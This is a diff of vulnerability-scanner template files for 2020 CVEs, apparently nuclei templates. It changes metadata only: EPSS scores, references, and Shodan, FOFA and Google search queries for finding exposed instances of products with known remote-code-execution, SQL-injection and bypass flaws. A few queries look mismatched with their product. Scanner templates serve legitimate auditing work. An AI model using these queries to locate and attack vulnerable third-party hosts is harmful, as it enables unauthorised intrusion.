a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -28,7 +28,10 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: title:"Oracle PeopleSoft Sign-in" + shodan-query: + - title:"Oracle PeopleSoft Sign-in" + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index e51ec40239..97d7f3ddf6 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-15050 cwe-id: CWE-22 epss-score: 0.55214 - epss-percentile: 0.97597 + epss-percentile: 0.9766 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index b5b5cbee31..00059c17ca 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 - epss-score: 0.00701 - epss-percentile: 0.7816 + epss-score: 0.01168 + epss-percentile: 0.84908 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 46ede2aed9..1b846f0d28 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: nette product: application - fofa-query: app="nette-Framework" + fofa-query: + - app="nette-Framework" + - app="nette-framework" tags: cve2020,cve,nette,rce http: diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 693c16af64..3f30f6d845 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -27,9 +27,11 @@ info: max-request: 7 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 7bc6078884..efcc8a74b2 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: dlink product: dir-816l_firmware - shodan-query: html:"DIR-816L" + shodan-query: + - html:"DIR-816L" + - http.html:"dir-816l" fofa-query: body="dir-816l" tags: cve2020,cve,dlink,xss diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 25fdb97add..4a99bb1cb2 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists http: diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index f78ac0a36d..d7a10bf562 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -28,9 +28,18 @@ info: max-request: 2 vendor: apache product: airflow - fofa-query: Apache Airflow - shodan-query: http.title:"airflow - dags" || http.html:"apache airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - Apache Airflow + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2020,apache,airflow,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 68a849e4e7..ffed4c673d 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2020,apache,rce,struts,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index af67953d7e..581b28113e 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47808 + epss-percentile: 0.48691 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index aa2c08d7bf..b230334678 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44405 + epss-percentile: 0.45236 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns product: jeesns - fofa-query: title="Jeesns" + fofa-query: + - title="Jeesns" + - title="jeesns" tags: cve,cve2020,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 0adb06cb83..587a2e9d98 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve2020,cve,apache,xss,ofbiz http: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index da7ff94265..b9d233d9a5 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -20,16 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - epss-score: 0.20647 - epss-percentile: 0.96263 + epss-score: 0.17677 + epss-percentile: 0.96134 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: weiphp product: weiphp - shodan-query: http.html:"WeiPHP5.0" - fofa-query: body="weiphp" + shodan-query: + - http.html:"WeiPHP5.0" + - http.html:"weiphp" + - http.html:"weiphp5.0" + fofa-query: + - body="weiphp" + - body="weiphp5.0" tags: cve,cve2020,weiphp,sql,sqli http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 93562827b0..ef340cdee3 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -28,8 +28,10 @@ info: max-request: 3 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve2020,cve,vpn,xss,paloaltonetworks http: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index e6a7925479..06706fef71 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -28,7 +28,9 @@ info: vendor: jenkins product: gitlab_hook framework: jenkins - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 7206405571..2340a0a7a5 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -27,7 +27,10 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve,cve2020,jenkins diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 3fe3e41431..2bcb4d3ba8 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - epss-score: 0.04664 - epss-percentile: 0.92423 + epss-score: 0.05094 + epss-percentile: 0.92923 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index e1ff6900d9..6e9c6b5eb3 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve2020,cve,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index b01d16360b..5e27ccca95 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -29,7 +29,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index bd4d0224a3..d37dc4ff78 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index b50cb137d1..6192c1df66 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -27,7 +27,9 @@ info: vendor: 74cms product: 74cms shodan-query: http.html:"74cms" - fofa-query: app="74cms" + fofa-query: + - app="74cms" + - body="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index f49f70617d..d33e424ccd 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html - https://www.exploit-db.com/exploits/49554 - https://nvd.nist.gov/vuln/detail/CVE-2020-22840 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 - epss-score: 0.01043 - epss-percentile: 0.82334 + epss-score: 0.01031 + epss-percentile: 0.83821 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 96381db450..9148e674de 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -28,8 +28,12 @@ info: max-request: 2 vendor: aryanic product: high_cms - shodan-query: title:"HighMail" - fofa-query: title="HighMail" + shodan-query: + - title:"HighMail" + - http.title:"highmail" + fofa-query: + - title="HighMail" + - title="highmail" google-query: intitle:"highmail" tags: cve,cve2020,xss,cms,highmail,aryanic diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 182530cf77..5acfb6341c 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -26,8 +26,8 @@ info: vendor: mooveagency product: import_xml_and_rss_feeds framework: wordpress - fofa-query: body="import-xml-feed" shodan-query: http.html:"import-xml-feed" + fofa-query: body="import-xml-feed" tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 213473fe25..6e913d1e4a 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: open-xchange product: open-xchange_appsuite - shodan-query: html:"Appsuite" + shodan-query: + - html:"Appsuite" + - http.html:"appsuite" fofa-query: body="appsuite" tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 99a4d2cb28..ae48d96c85 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: quixplorer_project product: quixplorer - shodan-query: http.title:"My Download Server" - google-query: intitle:"My Download Server" + shodan-query: + - http.title:"My Download Server" + - http.title:"my download server" fofa-query: title="my download server" + google-query: + - intitle:"My Download Server" + - intitle:"my download server" tags: cve,cve2020,quixplorer,xss,quixplorer_project http: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 9292fceb45..9b60357e10 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -28,7 +28,9 @@ info: vendor: cutesoft product: cute_editor framework: asp.net - shodan-query: http.component:"ASP.NET" + shodan-query: + - http.component:"ASP.NET" + - http.component:"asp.net" tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net http: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 5a7a51a139..f74ebef038 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - epss-score: 0.00176 - epss-percentile: 0.54822 + epss-score: 0.0025 + epss-percentile: 0.64924 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 23966e9388..3c7b78bb1c 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,weblogic,rce,unauth,kev diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index 40a8c9b236..f31f78c841 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 - epss-score: 0.04166 - epss-percentile: 0.92003 + epss-score: 0.0562 + epss-percentile: 0.93279 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index a5a9588d28..5e2b1528a0 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: hashicorp product: consul - shodan-query: http.title:"consul by hashicorp" + shodan-query: + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" tags: cve,cve2020,consul,xss,intrusive,hashicorp diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 8509b89117..3b414f79a5 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -14,21 +14,22 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-26153 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.47114 + epss-score: 0.00141 + epss-percentile: 0.4979 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: eventespresso - product: event_espresso + product: "event_espresso" framework: wordpress tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index ed2f7f7df1..eb7209e6aa 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.90088 - epss-percentile: 0.98718 + epss-percentile: 0.98778 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index ed03d23a82..6c2a2dc8c5 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index d56d379e32..8766c1a98d 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: oracle product: jd_edwards_enterpriseone_tools - shodan-query: port:8999 product:"Oracle WebLogic Server" + shodan-query: + - port:8999 product:"Oracle WebLogic Server" + - port:8999 product:"oracle weblogic server" tags: cve2020,cve,oracle,weblogic,disclosure,exposure http: diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index ee8a0d7b4c..2da53f49ae 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.01056 - epss-percentile: 0.83739 + epss-score: 0.00856 + epss-percentile: 0.82223 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 2e5af92475..2862c465a9 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -27,10 +27,17 @@ info: max-request: 1 vendor: redhat product: keycloak - shodan-query: "title:\"keycloak\"" - fofa-query: title="keycloak" + shodan-query: + - "title:\"keycloak\"" + - http.title:"keycloak" + - http.html:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2020,keycloak,exposure + tags: cve,cve2020,keycloak,exposure,redhat http: - method: GET diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 956b55feb9..a39b13659a 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -27,9 +27,18 @@ info: max-request: 1 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve,cve2020,xss,icewarp,packetstorm http: diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 84fc04f8c8..4d4e2b0112 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: terra-master product: tos - fofa-query: '"TerraMaster" && header="TOS"' + fofa-query: + - '"TerraMaster" && header="TOS"' + - '"terramaster" && header="tos"' tags: cve2020,cve,terramaster,enum,tos,terra-master http: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 4fbdc41294..1aa44b0b12 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -20,13 +20,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.0036 - epss-percentile: 0.71646 - cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* + epss-score: 0.00359 + epss-percentile: 0.72145 + cpe: cpe:2.3:h:mitel:shoretel:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mitel - product: shoretel_firmware + product: shoretel tags: cve,cve2020,packetstorm,shoretel,xss,mitel http: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 20fbd8c529..f2406610f4 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -27,9 +27,9 @@ info: max-request: 2 vendor: monitorr product: monitorr - fofa-query: icon_hash="-211006074" shodan-query: http.favicon.hash:"-211006074" - tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project + fofa-query: icon_hash="-211006074" + tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr variables: string: "CVE-2020-28871" diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 7585eb5de8..69269b0765 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - epss-percentile: 0.78321 + epss-percentile: 0.78728 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: - max-request: 3 + max-request: 4 vendor: canto product: canto framework: wordpress tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 3434eddbcb..92fe6d1c2d 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -24,14 +24,21 @@ info: epss-percentile: 0.91992 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: myeventon product: eventon framework: wordpress - fofa-query: wp-content/plugins/eventon/ - publicwww-query: /wp-content/plugins/eventon/ - shodan-query: http.html:/wp-content/plugins/eventon/ - google-query: inurl:"/wp-content/plugins/eventon/" + shodan-query: + - "http.html:/wp-content/plugins/eventon/" + - http.html:/wp-content/plugins/eventon-lite/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon/" + - /wp-content/plugins/eventon-lite/ + google-query: "inurl:\"/wp-content/plugins/eventon/\"" tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 01f2f70c6f..ac3267e8d3 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index d8c23bb270..ee66c5cf2e 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: zyxel product: usg20-vpn_firmware - shodan-query: title:"USG FLEX 100" + shodan-query: + - title:"USG FLEX 100" + - http.title:"usg flex 100" fofa-query: title="usg flex 100" google-query: intitle:"usg flex 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 96155b7dcf..4670852c33 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: opentsdb product: opentsdb - shodan-query: html:"OpenTSDB" + shodan-query: + - html:"OpenTSDB" + - http.html:"opentsdb" fofa-query: body="opentsdb" tags: cve,cve2020,opentsdb,rce,packetstorm diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index df75de7975..2a93e5b53b 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - epss-score: 0.95566 - epss-percentile: 0.99266 + epss-score: 0.95163 + epss-percentile: 0.99327 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 1145fee9cb..abb36f9cf2 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + - https://github.com/ezelnur6327/Enes4xd classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - epss-score: 0.02144 - epss-percentile: 0.88116 + epss-score: 0.0312 + epss-percentile: 0.91079 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 2b6dd3022a..cac2e5663a 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ 